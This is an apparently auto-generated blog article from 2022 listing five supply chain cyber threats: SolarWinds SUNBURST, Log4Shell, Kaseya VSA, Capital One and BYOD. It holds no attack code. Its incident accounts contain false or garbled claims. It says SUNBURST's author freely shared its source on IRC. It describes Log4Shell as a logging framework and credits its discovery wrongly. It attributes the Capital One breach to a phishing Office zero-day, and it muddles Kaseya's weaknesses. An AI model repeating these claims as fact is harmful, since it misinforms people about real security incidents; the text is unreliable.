September 21, 2022,
In today’s world, supply chain cyber threats are one of the fastest-growing areas in both small and large businesses. It is because cybercriminals have been able to find and exploit business vulnerabilities in their supply chains. Read this article to discover five possible reasons that your business is vulnerable to cyber threats in the supply chain.
The SolarWinds SUNBURST Backdoor
The Solarwinds SUNBURST backdoor allows the attacker to control the infected system completely. Once infected, the attacker can log in as any user on the system, change system settings and modify network settings. The attacker can move files and even take snapshots of entire systems without network administrators’ detection.
The source code and documentation for this backdoor have been widely shared on public forums, including recent, a popular IRC channel for information security professionals.
The hacker who wrote the code has also made it available to other hackers free of charge to incorporate it into their malicious code.
Log4Shell / Log4j Exploit and Open Source Software Vulnerabilities
Log4Shell is an open-source logging framework for Java and the Log4j API. The Log4j API is based on the popular Apache log4j. It allows developers to easily add logging support to their applications using common frameworks like Apache’s log4j.
These vulnerabilities, discovered by researcher Hayssam Keilany, allow anyone with network access to inject Shell commands into any application that uses Log4J as a logging framework.
If anyone can inject a command into any application that uses Log4j, they can steal any data on the system and access any files on the local filesystem.
Kaseya VSA Attack and Managed Services and Software Ransomware
Kaseya is a Managed Services and Software-as-a-Service provider. It means that Kaseya is a middleman that handles software delivery to its subscribers’ managed service customers.
Kaseya’s security weaknesses are the result of a combination of several factors. First, it does not have its point-entity database for tracking users, simplifying access to protected resources for remote attackers.
Second, the company uses Remote Desktop Protocol to connect to its users’ computers, making it very easy for attackers with access to its network to access sensitive files on those computers.
The Capital One Attack and Cloud Infrastructure Security Flaws
The Capital One breach is the largest of its kind in recent years. It affected customers with credit cards and checking accounts with Capital One.
The attack involved a phishing attack that relied on fake Outlook emails to trick victims into downloading malicious attachments that exploited a zero-day exploit in the Microsoft Office application. Once downloaded, the attackers could remotely access victims’ computers and gain access to their systems.
Bring Your Device (BYOD) Vulnerabilities and Vendor Devices
The Bring Your Device trend has created a new playground for threat actors and cybercriminals. Many businesses rely on the vendors that supply their devices to secure their systems.
With BYOD, many businesses allow employees to use their devices for corporate activities. Other companies that use vendor-supplied devices for BYOD rely on the vendors to ensure that their operating systems and network architecture are secure.
The supply chain is essential for every business. As a result, cybercriminals and threat actors have been using it to deliver malware and other malicious threats to businesses. The five vulnerabilities discussed here are just some ways cyber threats can get into the supply chain attacks.